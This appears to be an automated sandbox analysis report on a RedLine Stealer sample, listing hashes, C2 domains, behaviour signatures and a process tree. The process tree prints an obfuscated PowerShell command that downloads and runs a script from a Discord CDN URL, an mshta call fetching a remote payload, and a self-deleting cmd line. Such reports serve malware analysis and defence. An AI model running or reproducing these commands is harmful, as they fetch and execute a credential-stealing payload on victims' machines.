Analysis

  • max time kernel
    151s
  • max time network
    152s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    14-08-2021 06:48

General

  • Target

    f618840fdc6d40a683f35a268444ad53.exe

  • Size

    1.0MB

  • MD5

    f618840fdc6d40a683f35a268444ad53

  • SHA1

    259eaba7e8902e26f516f47f25aa35e78496b0d3

  • SHA256

    f60f32ec899bcb92fd50491a8c32f0548afbd4dc02462dfa373d484b4b161a86

  • SHA512

    eaef79404a16724db4eaa4e898d4ae3c575a8bcde0227aad94d0099b49b407676678113375252c085ce447188047a0e5233696d236208f81bf1519b9e4b920e7

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://cdn.discordapp.com/attachments/875766613159333928/875766957905969182/matematecle.txt

Extracted

Family

redline

Botnet

080821

C2

cookiebrokrash.info:80

Extracted

Family

redline

Botnet

2

C2

lllwyerxedo.xyz:80

Signatures

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 6 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 3 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies registry class 64 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 15 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 42 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\f618840fdc6d40a683f35a268444ad53.exe
    "C:\Users\Admin\AppData\Local\Temp\f618840fdc6d40a683f35a268444ad53.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3972
    • C:\Users\Admin\AppData\Local\Temp\936213988.exe
      C:\Users\Admin\AppData\Local\Temp\936213988.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2988
      • C:\Users\Admin\AppData\Local\Temp\936213988.exe
        C:\Users\Admin\AppData\Local\Temp\936213988.exe
        3⤵
          PID:2740
        • C:\Users\Admin\AppData\Local\Temp\936213988.exe
          C:\Users\Admin\AppData\Local\Temp\936213988.exe
          3⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          PID:3544
      • C:\Users\Admin\AppData\Local\Temp\1137791014.exe
        C:\Users\Admin\AppData\Local\Temp\1137791014.exe
        2⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1052
        • C:\Windows\System32\mshta.exe
          "C:\Windows\System32\mshta.exe" https://cdn.discordapp.com/attachments/875766613159333928/875767110058532884/geometre.txt
          3⤵
          • Blocklisted process makes network request
          • Suspicious use of WriteProcessMemory
          PID:200
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $SRDTFYGUHIUGYFTDRYDTYUFUGIHLUGYFUTDUFY='https://cdn.discordapp.com/attachments/875766613159333928/875766957905969182/matematecle.txt';$SFDDHGFJGKHLJKHJGHFGFGDHFGHK='DOWNSDFGDHFJGKHFGHDFGDHJGKHFJGDHFSHGDHJKGFHGDHFSHGDJFKJGKJKHFJGDHING'.Replace('SDFGDHFJGKHFGHDFGDHJGKHFJGDHFSHGDHJKGFHGDHFSHGDJFKJGKJKHFJGDH','LOADSTR');$RGHTFYGUKLHIDZXFCGVJHBHVGCFXDZFGXFHCGJV='SYEFSRGDTHYFUGKYFTDRSEASGRDHTFYUGKKGYFTDHRGDM.NEDTHFYJGUKHGYFTDRYTFYGUHGYFTDYFYGUTDUFYGUBClIENT'.Replace('EFSRGDTHYFUGKYFTDRSEASGRDHTFYUGKKGYFTDHRGD','STE').Replace('DTHFYJGUKHGYFTDRYTFYGUHGYFTDYFYGUTDUFYGU','T.WE');$ESTRDYTUFYGIUHIJOSERDTFYJGUKYTDRSTDYFUGK = '(NAFSHDGFJGKHLGFSGRHTDYFJGUKYFTDHRSHDTFYBJECT $RGHTFYGUKLHIDZXFCGVJHBHVGCFXDZFGXFBBBBBBBBBBBBBBHHHHHHHHHHHHHRDTFYGUHIUGYFTDRYDTYUFUGIHLUGYFUTDUFY)'.Replace('AFSHDGFJGKHLGFSGRHTDYFJGUKYFTDHRSHDTFY','EW-O').Replace('BBBBBBBBBBBBBBHHHHHHHHHHHHH','HCGJV ).$SFDDHGFJGKHLJKHJGHFGFGDHFGHK($S');$ERTTDYFYUGUYTREZRTFYGKUFDSS45HD6F7GK=&('I'+'EX')($ESTRDYTUFYGIUHIJOSERDTFYJGUKYTDRSTDYFUGK -Join '')|&('I'+'EX');
            4⤵
            • Blocklisted process makes network request
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:3872
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
              5⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:4936
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /k ping 0 & del C:\Users\Admin\AppData\Local\Temp\f618840fdc6d40a683f35a268444ad53.exe & exit
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:4256
        • C:\Windows\SysWOW64\PING.EXE
          ping 0
          3⤵
          • Runs ping.exe
          PID:4324
    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
      1⤵
      • Drops file in Windows directory
      • Modifies Internet Explorer settings
      • Modifies registry class
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      PID:3516
    • C:\Windows\system32\browser_broker.exe
      C:\Windows\system32\browser_broker.exe -Embedding
      1⤵
      • Modifies Internet Explorer settings
      PID:60
    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
      1⤵
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:4340
    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
      1⤵
      • Modifies Internet Explorer settings
      • Modifies registry class
      • Suspicious use of AdjustPrivilegeToken
      PID:4428
    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
      1⤵
      • Modifies registry class
      • Suspicious use of AdjustPrivilegeToken
      PID:4804
    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
      1⤵
      • Modifies registry class
      PID:4152
    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
      1⤵
      • Modifies registry class
      PID:3692

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/1052-135-0x0000000000B90000-0x0000000000B91000-memory.dmp

      Filesize

      4KB

    • memory/1052-142-0x000000001B790000-0x000000001B792000-memory.dmp

      Filesize

      8KB

    • memory/1052-143-0x00000000010D0000-0x00000000010D1000-memory.dmp

      Filesize

      4KB

    • memory/2988-119-0x0000000005970000-0x0000000005971000-memory.dmp

      Filesize

      4KB

    • memory/2988-123-0x0000000005400000-0x0000000005421000-memory.dmp

      Filesize

      132KB

    • memory/2988-122-0x0000000005460000-0x0000000005461000-memory.dmp

      Filesize

      4KB

    • memory/2988-121-0x00000000052D0000-0x00000000052D1000-memory.dmp

      Filesize

      4KB

    • memory/2988-120-0x0000000005320000-0x0000000005321000-memory.dmp

      Filesize

      4KB

    • memory/2988-117-0x0000000000810000-0x0000000000811000-memory.dmp

      Filesize

      4KB

    • memory/3516-150-0x0000028153B20000-0x0000028153B30000-memory.dmp

      Filesize

      64KB

    • memory/3544-141-0x0000000005310000-0x0000000005916000-memory.dmp

      Filesize

      6.0MB

    • memory/3544-137-0x0000000005410000-0x0000000005411000-memory.dmp

      Filesize

      4KB

    • memory/3544-140-0x0000000005680000-0x0000000005681000-memory.dmp

      Filesize

      4KB

    • memory/3544-131-0x00000000053D0000-0x00000000053D1000-memory.dmp

      Filesize

      4KB

    • memory/3544-130-0x0000000005370000-0x0000000005371000-memory.dmp

      Filesize

      4KB

    • memory/3544-129-0x0000000005920000-0x0000000005921000-memory.dmp

      Filesize

      4KB

    • memory/3544-124-0x0000000000400000-0x000000000041E000-memory.dmp

      Filesize

      120KB

    • memory/3544-165-0x0000000006DB0000-0x0000000006DB1000-memory.dmp

      Filesize

      4KB

    • memory/3544-164-0x00000000066B0000-0x00000000066B1000-memory.dmp

      Filesize

      4KB

    • memory/3872-155-0x0000029DF56F0000-0x0000029DF56F2000-memory.dmp

      Filesize

      8KB

    • memory/3872-157-0x0000029DF56F3000-0x0000029DF56F5000-memory.dmp

      Filesize

      8KB

    • memory/3872-177-0x0000029DF5830000-0x0000029DF583E000-memory.dmp

      Filesize

      56KB

    • memory/3872-162-0x0000029DF56F6000-0x0000029DF56F8000-memory.dmp

      Filesize

      8KB

    • memory/3872-153-0x0000029DF5880000-0x0000029DF5881000-memory.dmp

      Filesize

      4KB

    • memory/3872-149-0x0000029DF56B0000-0x0000029DF56B1000-memory.dmp

      Filesize

      4KB

    • memory/4936-178-0x0000000000400000-0x000000000041E000-memory.dmp

      Filesize

      120KB

    • memory/4936-188-0x00000000053B0000-0x00000000053B1000-memory.dmp

      Filesize

      4KB

    • memory/4936-190-0x00000000052A0000-0x00000000058A6000-memory.dmp

      Filesize

      6.0MB

    • memory/4936-193-0x00000000065B0000-0x00000000065B1000-memory.dmp

      Filesize

      4KB

    • memory/4936-195-0x0000000007280000-0x0000000007281000-memory.dmp

      Filesize

      4KB

    • memory/4936-197-0x0000000007380000-0x0000000007381000-memory.dmp

      Filesize

      4KB